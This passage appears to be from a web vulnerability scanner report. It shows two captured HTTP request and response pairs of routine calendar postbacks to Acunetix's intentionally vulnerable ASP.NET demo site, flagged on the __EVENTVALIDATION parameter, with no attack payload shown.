Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8132&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAG48pGNoIZGRk4E3mFhOhxAQfIOAXbODkKN9fXZk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL3zoDWBgKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDEjf99NDBKNDolMZYcHlCJ8wOmek
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:09:51 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAG48pGNoIZGRk4E3mFhOhxAQfIOAXbODkKN9fXZk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL3zoDWBgKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDEjf99NDBKNDolMZYcHlCJ8wOmek" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:White" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1187 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,187 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8287&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAIj32kdoIZGRkIAQ7DtgU%2BM%2F4TsgvNv12Uei0f04%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL77a3%2FDgLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAvpTZQqHZ47lrxL%2B5jyVJjA7Fcot
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:11:53 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAIj32kdoIZGRkIAQ7DtgU+M/4TsgvNv12Uei0f04=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL77a3/DgLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAvpTZQqHZ47lrxL+5jyVJjA7Fcot" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:White" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. 